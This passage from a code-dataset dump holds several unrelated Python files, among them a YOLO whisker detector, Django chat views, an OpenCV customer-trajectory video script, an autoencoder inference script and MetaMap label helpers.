QtWidgets.QMainWindow()\n ui_II = Ui_MainWindow()\n ui_II.setupUi(window_II) \n window_II.show()\n app.exec_()\n #sys.exit(app.exec_()) \n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n interface_inicial_setupUI()\n dioptas.run()\n \n \n''' Funcionando com o import do PyDm mas não compatível com interface_inicial\nfrom pydm import PyDMApplication\nfrom interface_dioptas import setup_dioptas, ui_dioptas\ncontroller_dioptas = setup_dioptas()\ndioptas = ui_dioptas(ctl=controller_dioptas)\n\n\nif __name__ == \"__main__\":\n dioptas.run()\n \n'''\n''' Funcionando com o import do PyDM\nfrom pydm import PyDMApplication\nfrom qtpy import QtWidgets\nfrom dioptas.controller.MainController import MainController\napp = QtWidgets.QApplication([])\ncontroller = MainController()\n\nif __name__ == \"__main__\":\n #dio = DioptasApp()\n #dio.run()\n #app = QtWidgets.QApplication([])\n #app = PyDMApplication()\n #controller = MainController()\n controller.show_window()\n app.exec_()\n del app\n \n''' ","sub_path":"interface_pyfai/main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"55408626","text":"import sys, math\n\nq = [ '\\0\\0\\0\\0' ] * 930\n\ndef rgbw(rgb):\n\trgb = [ ord(x)**(2.2) for x in rgb ]\n\tm = min(rgb)\n\treturn ''.join( chr( int ((x-m)**(1/2.2)) ) for x in rgb 
)+chr(int(m**(1/2.2)))\n\n\nwhile True:\n\ts = sys.stdin.read(900*3)\n\tif len(s) != 900*3:\n\t\tbreak\n\tfor i in xrange(900):\n\t\tsi = i*3\n\t\tdi = i+(i>=450)*30\n\t\t#q[di] = s[si:si+3]+'\\x00'\n\t\tq[di] = rgbw(s[si:si+3])\n\n\n\tsys.stdout.write(''.join(q).replace('\\x01', '\\x02')+'\\x01')\n\t\n","sub_path":"scripts/teensyoutw.py","file_name":"teensyoutw.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}{"seq_id":"454071092","text":"import datetime\n\n\nx = datetime.datetime(2019, 2, 15, 12, 45, 35)\n\ni = 0\n\nwhile i <30 :\n    x = x+datetime.timedelta(days=1)+datetime.timedelta(hours=1)\n    print(x.strftime(\"%Y-%m-%d %H:%M:%S\"))\n    i=i+1","sub_path":"textSolve/日期测试.py","file_name":"日期测试.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}{"seq_id":"68347057","text":"def inverse(x):\n    x=str(x)\n    x=x[::-1]\n    x=int(x)\n    return x\nprint(\"Calculating whether each value is one of: palindrome, non-lychrel or lychrel candidate\")\n\nnumbers=[]\nlychrel=[]\n\nx=int(input(\"Give the lower bound of numbers to consider: \"))\nx1=int(input(\"Give the upper bound of numbers to consider: \"))\n\nprint (\"The range of numbers analyzed goes from %s to %s\" %(x,x1))\nfor i in range(x1-x+1):\n    numbers.append(x)\n    x=x+1\na=0\nb=0\nab=0\nfor i in numbers:\n    y=inverse(i)\n    if i==y:\n        a=a+1\n    else:\n        z=i+y\n        y1=inverse(z)\n        for i1 in range(30):\n            if z==y1:\n                ab=ab+1\n                break\n            else:\n                z=z+y1\n                y1=inverse(z)\n            if i1==29:\n                b=b+1\n                lychrel.append(i)\nprint(\"the number of natural palindromes is: %s\"%(a))\nprint(\"the number of non-lychrel numbers is: %s\"%(ab))\nprint(\"the number of lychrel number candidates is: %s\"%(b))\nif b!= 0:\n    print (\"found lychrel numbers: \")\n    print (lychrel)\n","sub_path":"wsq11.py","file_name":"wsq11.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}{"seq_id":"527134791","text":"# qqwweee/keras-yolo3 is licensed under the MIT License\n# https://github.com/qqwweee/keras-yolo3/blob/master/LICENSE\n\nfrom timeit import default_timer as timer\nimport os\nimport os.path\n\nimport colorsys\nimport numpy as np\nfrom keras import backend as K\nfrom keras.models import load_model\nfrom keras.layers import Input\n\nfrom linc_cv.settings import YOLO_ANCHORS_PATH, YOLO_ANCHORS_CLASSES\nfrom .yolo3.model import yolo_eval, yolo_body, tiny_yolo_body\nfrom .yolo3.utils import letterbox_image\n\n\nclass YOLO(object):\n    def __init__(self, model_path):\n        # model path or trained weights path\n        self.model_path = model_path\n        self.anchors_path = YOLO_ANCHORS_PATH\n        self.classes_path = YOLO_ANCHORS_CLASSES\n        self.score = 0.3\n        self.iou = 0.45\n        self.class_names = self._get_class()\n        self.anchors = self._get_anchors()\n        self.sess = K.get_session()\n        self.model_image_size = (416, 416) # fixed size or (None, None), hw\n        self.boxes, self.scores, self.classes = self.generate()\n\n    def _get_class(self):\n        classes_path = os.path.expanduser(self.classes_path)\n        with open(classes_path) as f:\n            class_names = f.readlines()\n        class_names = [c.strip() for c in class_names]\n        return class_names\n\n    def _get_anchors(self):\n        anchors_path = os.path.expanduser(self.anchors_path)\n        with open(anchors_path) as f:\n            anchors = f.readline()\n        anchors = [float(x) for x in anchors.split(',')]\n        return np.array(anchors).reshape(-1, 2)\n\n    def generate(self):\n        
model_path = os.path.expanduser(self.model_path)\n assert model_path.endswith(\n '.h5'), 'Keras model or weights must be a .h5 file.'\n\n # Load model, or construct model and load weights.\n num_anchors = len(self.anchors)\n num_classes = len(self.class_names)\n is_tiny_version = num_anchors == 6 # default setting\n try:\n self.yolo_model = load_model(model_path, compile=False)\n except:\n if is_tiny_version:\n self.yolo_model = tiny_yolo_body(Input(shape=(None, None, 3)), num_anchors // 2, num_classes)\n else:\n self.yolo_model = yolo_body(Input(shape=(None, None, 3)), num_anchors // 3, num_classes)\n # make sure model, anchors and classes match\n self.yolo_model.load_weights(self.model_path)\n else:\n assert self.yolo_model.layers[-1].output_shape[-1] == num_anchors / len(self.yolo_model.output) * (\n num_classes + 5), \\\n 'Mismatch between model and given anchor and class sizes'\n\n print('{} model, anchors, and classes loaded.'.format(model_path))\n\n # Generate colors for drawing bounding boxes.\n hsv_tuples = [(x / len(self.class_names), 1., 1.)\n for x in range(len(self.class_names))]\n self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n self.colors = list(\n map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),\n self.colors))\n np.random.seed(10101) # Fixed seed for consistent colors across runs.\n # Shuffle colors to decorrelate adjacent classes.\n np.random.shuffle(self.colors)\n np.random.seed(None) # Reset seed to default.\n\n # Generate output tensor targets for filtered bounding boxes.\n self.input_image_shape = K.placeholder(shape=(2,))\n boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,\n len(self.class_names), self.input_image_shape,\n score_threshold=self.score, iou_threshold=self.iou)\n return boxes, scores, classes\n\n def detect_image(self, image):\n\n if self.model_image_size != (None, None):\n assert self.model_image_size[0] % 32 == 0, 'Multiples of 32 required'\n assert self.model_image_size[1] % 32 == 0, 'Multiples of 32 required'\n boxed_image = letterbox_image(\n image, tuple(reversed(self.model_image_size)))\n else:\n new_image_size = (image.width - (image.width % 32),\n image.height - (image.height % 32))\n boxed_image = letterbox_image(image, new_image_size)\n image_data = np.array(boxed_image, dtype='float32')\n image_data /= 255.\n image_data = np.expand_dims(image_data, 0) # Add batch dimension.\n\n out_boxes, out_scores, out_classes = self.sess.run(\n [self.boxes, self.scores, self.classes],\n feed_dict={\n self.yolo_model.input: image_data,\n self.input_image_shape: [image.size[1], image.size[0]],\n K.learning_phase(): 0\n })\n\n rois = []\n for i, c in reversed(list(enumerate(out_classes))):\n predicted_class = self.class_names[c]\n box = out_boxes[i]\n score = out_scores[i]\n top, left, bottom, right = box\n top = max(0, np.floor(top + 0.5).astype('int32'))\n left = max(0, np.floor(left + 0.5).astype('int32'))\n bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))\n right = min(image.size[0], np.floor(right + 0.5).astype('int32'))\n rois.append([predicted_class, float(score), int(top), int(left), int(bottom), int(right)])\n return rois\n\n def close_session(self):\n self.sess.close()\n\n\nVALID_IMAGE_EXTENSIONS = {'.jpeg', '.jpg', '.png', '.bmp'}\n\nif __name__ == '__main__':\n import os\n import os.path\n import argparse\n\n model_path = \"whisker_model.h5\"\n parser = argparse.ArgumentParser(\n description='Find whisker bounding box from lion face image')\n 
parser.add_argument('whisker_image_path')\n    args = parser.parse_args()\n    assert os.path.isfile(args.whisker_image_path), args.whisker_image_path\n    yolo = YOLO(model_path=model_path)\n    # detect_image expects a PIL image, not a file path, so open the file first\n    from PIL import Image\n    image = Image.open(args.whisker_image_path)\n    for _ in range(20):\n        rois = yolo.detect_image(image)\n        print('rois', rois)\n    yolo.close_session()\n\n","sub_path":"linc_cv/modality_whisker/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}{"seq_id":"440268017","text":"from django.shortcuts import render, HttpResponse\nfrom user_auth.decorators import login_required,management_required\nfrom user_auth.models import User,Profile\nfrom clans.models import community\nfrom .models import Message, GroupMessage\n\nimport base64\nimport datetime,json\n\n# Create your views here.\n\n# import the MongoClient class from the library\nfrom pymongo import MongoClient\nmongo_client = MongoClient()\ndb = mongo_client.EAD_OOAL\n\n\n@login_required\ndef chatHome(request):\n    username = request.session[\"username\"]\n    user = User.objects(email=username)[0]\n    profile = Profile.objects(user_id=user[\"id\"])[0]\n    frnds = profile.friends\n    clans = profile.clans_registered\n    friends_list = []\n    groups_list = []\n    for friend in frnds:\n        temp = dict()\n        frnd = Profile.objects(user_id=friend)[0]\n        frnd_u = User.objects(id=friend)[0]\n        temp['name'] = frnd[\"name\"]\n        temp['id'] = frnd_u[\"id\"]\n        photo= frnd[\"photo\"].read()\n        my_string = base64.b64encode(photo)\n        temp[\"photo\"] = my_string.decode('utf-8')\n        friends_list.append(temp)\n    print(len(friends_list))\n    for clan in clans:\n        temp = dict()\n        group = community.objects(id=clan)[0]\n        temp[\"id\"] = group[\"id\"]\n        temp['name'] = group[\"name\"]\n        photo= group[\"photo\"].read()\n        my_string = base64.b64encode(photo)\n        temp[\"photo\"] = my_string.decode('utf-8')\n        groups_list.append(temp)\n    print(len(groups_list))\n    return render(request,'chat/home.html',{'friends_list': friends_list, 'groups_list': groups_list})\n\n@login_required\ndef getMsgs(request):\n    if request.method==\"GET\":\n        chat_msgs = []\n        friend_id = request.GET['f_id']\n        cu_user = request.session[\"username\"]\n        c_user = User.objects(email=cu_user)[0]\n        c_u_prof = Profile.objects(user_id=c_user['id'])[0]\n        msgs = c_u_prof['messages']\n\n        if(msgs):\n            for msg in msgs:\n                c_msg = Message.objects(id=msg)[0]\n                if c_msg['sender'] == friend_id:\n                    chat_msgs.append(c_msg)\n\n        # pass the collected messages to the template so they are not silently discarded\n        return render(request,'chat/priv_msg.html', {'chat_msgs': chat_msgs})\n\n@login_required\ndef getGroupMsgs(request):\n    if request.method==\"GET\":\n        group_msgs = []\n        group_id = request.GET['clan_id']\n        print(\"Group Id : \",group_id)\n        cu_user = request.session[\"username\"]\n        c_user = User.objects(email=cu_user)[0]\n        uid = c_user['id']\n        clan = community.objects(id=group_id)[0]\n        print(\"got clan object\")\n        temp = dict()\n        temp['id'] = clan[\"id\"]\n        temp['name'] = clan[\"name\"]\n        photo= clan[\"photo\"].read()\n        my_string = base64.b64encode(photo)\n        temp[\"photo\"] = my_string.decode('utf-8')\n        group_details = temp\n\n        msgs = clan['messages']\n        for msg in msgs:\n            print(msg)\n            g_msg = GroupMessage.objects(id=msg)[0]\n            group_msgs.append(g_msg)\n        return render(request,'chat/msg.html', {'group_msgs': group_msgs, \"group_details\": group_details, \"uid\":uid})\n\n\n@login_required\ndef sendGrpMsg(request):\n    if request.method =='POST':\n        text = request.POST['msg']\n        c_id = request.POST['clan_id']\n        cu_user = request.session[\"username\"]\n        c_user = User.objects(email=cu_user)[0]\n        
c_u_prof = Profile.objects(user_id=c_user['id'])[0]\n message = GroupMessage(msg=text,sender=c_user['id'],group=c_id)\n message.save()\n print(\"message saved\")\n print(message['id'])\n community.objects(id=c_id).update_one(push__messages = message['id'])\n return HttpResponse('Success')\n else:\n return HttpResponse('Failure')\n\n\n\ndef getPrivMsgs(request):\n if request.method == 'GET':\n frnd_id = request.GET['f_id']\n\n cu_user = request.session[\"username\"]\n c_user = User.objects(email = cu_user)[0]\n cu_prof = Profile.objects.get(user_id = c_user['id'])\n frnd_prof = Profile.objects.get(user_id = frnd_id)\n my_id = c_user['id']\n frnd_name = frnd_prof['name']\n\n myphoto= cu_prof[\"photo\"].read()\n myph = base64.b64encode(myphoto)\n my_photo = myph.decode('utf-8')\n frndphoto= frnd_prof[\"photo\"].read()\n frndph = base64.b64encode(frndphoto)\n frnd_photo = frndph.decode('utf-8')\n\n\n msgs = cu_prof['messages']\n print('Profile msgs', len(msgs))\n messages = []\n\n for msg in msgs:\n print(msg)\n temp = Message.objects.get(id = msg)\n temp_r = temp['reciever']\n temp_s = temp['sender']\n ff_id = frnd_prof['user_id']\n print(temp_r == ff_id)\n print(temp_s == ff_id)\n if temp_s == ff_id or temp_r == ff_id:\n temp1 = dict()\n temp1['message'] = temp['msg']\n temp1['sender'] = temp['sender']\n temp1['reciever'] = temp['reciever']\n temp1['time'] = temp['createdAt']\n\n messages.append(temp1)\n else:\n continue\n\n print('messages',len(messages))\n print('frnd', frnd_name)\n\n return render(request, 'chat/priv_msg.html', {'messages': messages, \"friend\": frnd_name ,\"my_id\":my_id, \"my_photo\":my_photo, \"frnd_photo\": frnd_photo, \"friend_id\": frnd_id})\n else:\n return HttpResponse('Failure')\n\ndef sendPrivMsg(request):\n if request.method == 'POST':\n print(\"got request\")\n text = request.POST['msg']\n frnd_id = request.POST['f_id']\n print(text)\n print(frnd_id)\n\n cu_user = request.session[\"username\"]\n c_user = User.objects(email = cu_user)[0]\n cu_prof = Profile.objects.get(user_id = c_user['id'])\n\n msg = Message(msg=text, sender=c_user['id'], reciever=frnd_id)\n msg.save()\n print(\"message saved\")\n\n Profile.objects(user_id = c_user['id']).update_one(push__messages = msg['id'])\n Profile.objects(user_id = frnd_id).update_one(push__messages = msg['id'])\n print(\"Profiles changed\")\n return HttpResponse('Success')\n else:\n return HttpResponse('Failure')\n","sub_path":"chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"593234160","text":"#!/usr/bin/python\n\n# This program creates a video showing the trajectory of a customer\n#\n# Usage:\n# ./createvideo.py <path to image frames folder> <path to json file> <output video name> <frame width> <frame height> <r component for path color>\n# <g component for path color> <b component for path color> <frame rate final video> <number of image detection>\n\nimport cv2\nimport sys\nimport json\nimport glob\nimport argparse\nimport datetime \n\n# script receives the following parameters\nparser = argparse.ArgumentParser()\nparser.add_argument('frames', type=str, help='image_frames_folder/*.jpg')\nparser.add_argument('jsonfile', type=str, help='JSON file')\nparser.add_argument('video', type=str, help='output video file (.avi)')\nparser.add_argument('width', type=str, help='frame width')\nparser.add_argument('height', type=str, help='frame height')\nparser.add_argument('r', type=str, help='red 
component trajectory')\nparser.add_argument('g', type=str, help='green component trajectory')\nparser.add_argument('b', type=str, help='blue component trajectory')\nparser.add_argument('frame_rate', type=str, help='frame rate')\nparser.add_argument('detection', type=str, help='detection name')\nargs = parser.parse_args()\n\ndirectory = args.frames\njson_file = args.jsonfile\noutput_file = args.video\nwidth = int(args.width)\nheight = int(args.height)\nframe_rate = int(args.frame_rate)\nlistx = []\nlisty = []\nlistw = []\nlisth = []\ncolor_path = (int(args.r), int(args.g), int(args.b))\ncolor_circle = color_path\ndetection = args.detection\n\n# video header\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nvideo = cv2.VideoWriter(output_file,fourcc, frame_rate, (width,height))\n\n####\n# given a detection name this function returns the cluster name for that\n# particular detection\n####\ndef retriveClusterName(det_n):\n cl_name = \"\"\n for cluster in data:\n for detection in cluster[\"files\"]:\n d_name = detection[\"name\"]\n d_name = d_name[(len(d_name)- 23):(len(d_name) - 4)]\n if (str(d_name) == str(det_n)):\n cl_name = str(cluster[\"name\"])\n break\n return cl_name\n\n###\n# get detection location for a particular frame and cluster\n###\ndef retrieveDetection(frame_time, cluster_label):\n center = []\n for cluster in data:\n for detection in cluster[\"files\"]:\n epoch = detection[\"epoch\"]\n if (str(epoch) == str(frame_time) and str(cluster_label) == str(cluster[\"name\"] )):\n # center_x = detection[\"head\"][\"x\"] + detection[\"head\"][\"width\"] /2\n # center_y = detection[\"head\"][\"y\"] + detection[\"head\"][\"height\"] /2\n # width_head = detection[\"head\"][\"width\"]\n # height_head = detection[\"head\"][\"height\"]\n center_x = int(detection[\"location\"][\"x\"] + detection[\"location\"][\"width\"] * 0.5)\n center_y = int(detection[\"location\"][\"y\"] + (detection[\"location\"][\"height\"] * 0.4))\n width_head = int(detection[\"location\"][\"width\"] * 0.3 )\n height_head= int(detection[\"location\"][\"height\"] * 0.3)\n center.append(center_x)\n center.append(center_y)\n center.append(width_head)\n center.append(height_head)\n break\n return center\n\n###\n# main script\n###\n# get the list of image names from directory\nfiles = glob.glob(directory)\n\n# read JSON file\nwith open(json_file) as data_file: \n data = json.load(data_file)\nno_detections = 0\n\n# get name first image of cluster \nfirst_image = detection[0:13] + '000000'\ncluster_name = retriveClusterName(detection)\non_first_image = False\n\n# for each file \nfor file in files:\n ext = file[len(file)-4:len(file)] # get image extension\n end = file.find(ext) - 6 \n start = end - 13\n frame_time = file[start:end] \n \n # look for the first frame containing the first customer detection\n if (not first_image == frame_time + '000000') and (not on_first_image):\n continue\n on_first_image = True\n\n frame = cv2.imread(file)\n frame_height, frame_width = frame.shape[:2]\n center = []\n cv2.rectangle(frame, (0, 0), (frame_width, 25), (0,0,0), -1, cv2.LINE_AA, 0)\n date = datetime.datetime.fromtimestamp(int(frame_time)/1000.0)\n cv2.putText(frame,date.strftime('%H:%M:%S'), (0,17), cv2.FONT_HERSHEY_SIMPLEX, .50, color_path, 1, cv2.LINE_AA)\n # retrieve detection information from JSON file\n center = retrieveDetection(frame_time, cluster_name )\n \n # there was a detection in this frame\n if not len(center) == 0:\n listx.append(center[0]) # center x\n listy.append(center[1]) # center y\n listw.append(center[2]) # width 
head\n listh.append(center[3]) # height head\n no_detections = 0\n else:\n no_detections += 1\n\n # plot curve for previous detections\n for p in range(1, len(listx)):\n if(p == len(listx)-1): # print a ellipse just in the last detection\n cv2.ellipse(frame, (listx[p], listy[p]), (listw[p], listh[p]), 0, 0, 360, color_circle, 2, cv2.LINE_AA)\n # plot path\n cv2.line(frame, (listx[p-1], listy[p-1]), (listx[p],listy[p]), color_path, 3, cv2.LINE_AA) \n #end for\n \n # if the person is not detected for 30 frames then the\n # list of points is deleted\n if no_detections > 30:\n listx = []; listx =[]; listw = []; listh = []\n \n # stop video creation 50 frames after last detection \n if no_detections > 50:\n break\n\n cv2.imshow('Tempo analytics', frame)\n video.write(frame) #save frame in video\n cv2.waitKey(int(1000/frame_rate))\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n# end for loop\n\ncv2.destroyAllWindows()\nvideo.release()","sub_path":"createvideo.py","file_name":"createvideo.py","file_ext":"py","file_size_in_byte":5474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"118532263","text":"import unittest\nimport numpy\nimport foo\n\nclass TestFooMethods(unittest.TestCase):\n\tdef test_Create_Array(self):\n\t\t'''testing createArray methods'''\n\t\tself.array = foo.create_Array((2,2))\n\t\tself.assertEqual(type(self.array), type(numpy.ones((2,2))), 'Created array is not a numpy array')\n\n\tdef test_reshapeArray(self):\n\t\tself.array = foo.create_Array((2,2))\n\t\tself.assertEqual(foo.reshape_Array(self.array,(1,4)).shape, (1,4), 'Reshape is not working')\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"219639020","text":"import os\r\nimport sys\r\nimport argparse\r\nimport pickle\r\nimport gzip\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom PIL import Image\r\nimport matplotlib\r\nmatplotlib.use('agg')\r\nsys.path.append(os.getcwd())\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom aae import AdversarialAutoEncoder as AAE\r\nfrom solder.custom_image_sampler_generate import ImageSampler\r\nfrom solder.autoencoder import AutoEncoder\r\nfrom solder.discriminator import Discriminator\r\nimport tensorflow as tf\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('ok_csv_path', type=str)\r\n parser.add_argument('ng_csv_path', type=str)\r\n parser.add_argument('ok_image_dir', type=str)\r\n parser.add_argument('ng_image_dir', type=str)\r\n parser.add_argument('--ok_test_nb_sample', '-otns', type=int, default=None)\r\n parser.add_argument('--ng_test_nb_sample', '-ntns', type=int, default=None)\r\n parser.add_argument('--batch_size', '-bs', type=int, default=234)\r\n parser.add_argument('--latent_dim', '-ld', type=int, default=16)\r\n parser.add_argument('--height', '-ht', type=int, default=64)\r\n parser.add_argument('--width', '-wd', type=int, default=64)\r\n parser.add_argument('--channel', '-ch', type=int, default=8)\r\n parser.add_argument('--model_path', '-mp', type=str, default=\"./params/epoch_200/model.ckpt\")\r\n parser.add_argument('--result_dir', '-rd', type=str, default=\"./result\")\r\n parser.add_argument('--nb_visualize_batch', '-nvb', type=int, default=1)\r\n parser.add_argument('--select_gpu', '-sg', type=str, default=\"0\")\r\n\r\n args = parser.parse_args()\r\n 
os.makedirs(args.result_dir, exist_ok=True)\r\n\r\n config = tf.ConfigProto(\r\n gpu_options=tf.GPUOptions(\r\n visible_device_list=args.select_gpu, # specify GPU number\r\n allow_growth=True)\r\n )\r\n\r\n input_shape = (args.height, args.width, args.channel)\r\n\r\n autoencoder = AutoEncoder(input_shape, args.latent_dim,\r\n is_training=False,\r\n channel=args.channel)\r\n discriminator = Discriminator(is_training=False)\r\n\r\n aae = AAE(autoencoder, discriminator, is_training=False)\r\n aae.restore(args.model_path)\r\n\r\n result_dir_inlier = os.path.join(args.result_dir, \"decoded/inlier\")\r\n result_dir_outlier = os.path.join(args.result_dir, \"decoded/outlier\")\r\n\r\n image_sampler = ImageSampler(target_size=(args.width, args.height),\r\n channel=args.channel,\r\n is_training=False)\r\n\r\n data_generator_inlier = image_sampler.flow_from_csv(args.ok_csv_path, args.ok_image_dir, args.batch_size, shuffle=False, nb_sample=args.ok_test_nb_sample)\r\n df_inlier = get_encoded_save_decoded(aae,\r\n data_generator_inlier,\r\n args.latent_dim,\r\n result_dir_inlier,\r\n label='inlier',\r\n nb_visualize=args.nb_visualize_batch)\r\n\r\n data_generator_outlier = image_sampler.flow_from_csv(args.ng_csv_path, args.ng_image_dir, args.batch_size, shuffle=False, nb_sample=args.ng_test_nb_sample)\r\n df_outlier = get_encoded_save_decoded(aae,\r\n data_generator_outlier,\r\n args.latent_dim,\r\n result_dir_outlier,\r\n label='outlier',\r\n nb_visualize=args.nb_visualize_batch)\r\n\r\n df = pd.concat([df_inlier, df_outlier], ignore_index=True)\r\n os.makedirs(args.result_dir, exist_ok=True)\r\n df.to_csv(os.path.join(args.result_dir, \"output.csv\"), index=False)\r\n\r\n\r\ndef get_encoded_save_decoded(model, data_generator, latent_dim, result_dir, label, nb_visualize):\r\n os.makedirs(result_dir, exist_ok=True)\r\n df = None\r\n\r\n for index, image_batch in enumerate(data_generator()):\r\n print('Processing ... 
[{} / {}]'.format(index*data_generator.batch_size, data_generator.n), end='\\r')\r\n current_df = data_generator.current_df\r\n encoded_batch = model.predict_latent_vectors_on_batch(image_batch)\r\n decoded_batch = model.predict_on_batch(image_batch)\r\n\r\n # store dataframe\r\n dict_ = dict(zip(['z_{}'.format(ld) for ld in range(latent_dim)],\r\n [encoded_batch[:, ld] for ld in range(latent_dim)]))\r\n current_df = current_df.assign(**dict_)\r\n zeros = np.zeros_like(encoded_batch)\r\n distances = np.array([get_distance(e, z) for e, z in zip(encoded_batch, zeros)])\r\n current_df = current_df.assign(\r\n distance=distances,\r\n label=label\r\n )\r\n\r\n if index == 0:\r\n df = current_df\r\n else:\r\n df = pd.concat([df, current_df])\r\n return df\r\n\r\n\r\ndef get_distance(v1, v2):\r\n return np.sqrt(np.sum([(x - y) ** 2 for (x, y) in zip(v1, v2)]))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"solder/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":5068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"262886871","text":"\"\"\"\nmetamap_helpers.py\nScope: Helper functions for interacting with metamap\nAuthors: Evan French\n\"\"\"\nfrom pymetamap import MetaMap, ConceptMMI\nfrom classes import Annotation\n\n#Author: Evan French\n#MetaMap semantic types corresponding to medical tests\ntests = [\n'amas', #Amino Acid Sequence\n'mbrt', #Molecular Biology Research Technique\n'edac', #Educational Activity\n'irda', #Indicator, Reagent, or Diagnostic Aid\n'ffas', #Fully Formed Anatomical Structure\n'ocdi', #Occupation or Discipline\n'elii', #Element, Ion, or Isotope\n'enty', #Entity\n'comd', #Cell or Molecular Dysfunction\n'vita', #Vitamin\n'nnon', #Nucleic Acid, Nucleoside, or Nucleotide\n'lbpr', #Laboratory Procedure\n]\n\n#Author: Evan French\n#MetaMap semantic types corresponding to medical treatments\ntreatments = [\n'clnd', #Clinical Drug\n'drdd', #Drug Delivery Device\n'orgt', #Organization\n'bodm', #Biomedical or Dental Material\n'mcha', #Machine Activity\n'food', #Food\n'hcpp', #Human-caused Phenomenon or Process\n'tisu', #Tissue\n'topp', #Therapeutic or Preventive Procedure\n'genf', #Genetic Function\n'antb', #Antibiotic\n'medd', #Medical Device\n'acty', #Activity\n'bdsu', #Body Substance\n'bsoj', #Body Space or Junction\n'bpoc', #Body Part, Organ, or Organ Component\n'popg', #Population Group\n'orgf', #Organism Function\n'plnt', #Plant\n'biof', #Biologic Function\n'mamm', #Mammal\n'blor', #Body Location or Region\n'spco', #Spatial Concept\n'anst', #Anatomical Structure\n'gora', #Governmental or Regulatory Activity\n'hlca', #Health Care Activity\n]\n\n#Author: Evan French\n#MetaMap semantic types corresponding to medical problems\nproblems = [\n'grpa', #Group Attribute\n'amph', #Amphibian\n'mobd', #Mental or Behavioral Dysfunction\n'bhvr', #Behavior\n'aggp', #Age Group\n'inpo', #Injury or Poisoning\n'lang', #Language\n'dsyn', #Disease or Syndrome\n]\n\n#Author: Evan French\ndef GetMetamapLabel(semTypeList, testList = None, treatmentList = None, problemList = None):\n \"\"\"\n Returns a predicted label for the list of MetaMap semantic types.\n All semantic types in the input list must be in a single 'master' list (see problems, tests, treatments above) \n to be assigned a label other than 'none'.\n\n @param semTypeList: list of sematic type abbreviations\n @return: predicted label (problem, test, treatment, or none)\n \"\"\"\n # Use parameters if provided, otherwise default to 
hardcodes\n testList = testList if testList != None else tests\n treatmentList = treatmentList if treatmentList != None else treatments\n problemList = problemList if problemList != None else problems\n\n #Default label is 'none'\n label = \"none\"\n \n semTypeSet = set(semTypeList)\n\n if not semTypeSet.isdisjoint(problemList) and semTypeSet.isdisjoint(testList) and semTypeSet.isdisjoint(treatmentList):\n label = \"problem\"\n elif semTypeSet.isdisjoint(problemList) and not semTypeSet.isdisjoint(testList) and semTypeSet.isdisjoint(treatmentList):\n label = \"test\"\n elif semTypeSet.isdisjoint(problemList) and semTypeSet.isdisjoint(testList) and not semTypeSet.isdisjoint(treatmentList):\n label = \"treatment\"\n \n return label\n\ndef CheckAnnotationAgainstSemTypes(annotation, semTypes, testList = None, treatmentList = None, problemList = None):\n \"\"\"\n Checks if the label on an annoation matches the predicted label from list of semantic types.\n\n @param annotation: An Annotation object\n @param semTypes: List of semantic types abbreviations\n @return: True if the labels match and label is not 'none', false otherwise\n \"\"\"\n mm_label = GetMetamapLabel(semTypes, testList, treatmentList, problemList)\n isSilver = mm_label != 'none' and annotation.label == mm_label\n return isSilver, mm_label\n\n#Author: Evan French\ndef GetMetaMapSemanticTypes(metamap_path, annotations):\n \"\"\"\n Uses MetaMap to return a list of sematic types for each annotation\n\n @param metamap_path: Path to MetaMap installation\n @param annotations: List of concepts parsed from annotation file\n @return: List of lists of sematic types for each annotation\n \"\"\"\n #Extract concepts from the list of annotations using MetaMap\n metamap = MetaMap.get_instance(metamap_path)\n indexes = range(len(annotations))\n concepts, error = metamap.extract_concepts(annotations, indexes)\n\n #List to hold a list of semantic types for each annotation\n anSemTypeList = [[] for x in range(len(annotations))]\n\n #Iterate over the list of concepts extracted from the list of annotations\n for concept in concepts:\n index = int(concept.index)\n if isinstance(concept, ConceptMMI):\n for semtype in concept.semtypes.strip('[]').split(','):\n if semtype not in anSemTypeList[index]:\n #Create a list of unique semantic types per annotation\n anSemTypeList[index].append(semtype)\n \n return anSemTypeList\n","sub_path":"metamap_helpers.py","file_name":"metamap_helpers.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"509122191","text":"import datetime\n\nfrom flask import flash, request\n\nfrom scrobbler import app, db, login_manager, __VERSION__\nfrom scrobbler.webui.consts import PERIODS\nfrom scrobbler.models import User\n\n\n@app.template_filter('timesince')\ndef timesince(time, now=None):\n chunks = (\n (60 * 60 * 24 * 365, 'year'),\n (60 * 60 * 24 * 30, 'month'),\n (60 * 60 * 24 * 7, 'week'),\n (60 * 60 * 24, 'day'),\n (60 * 60, 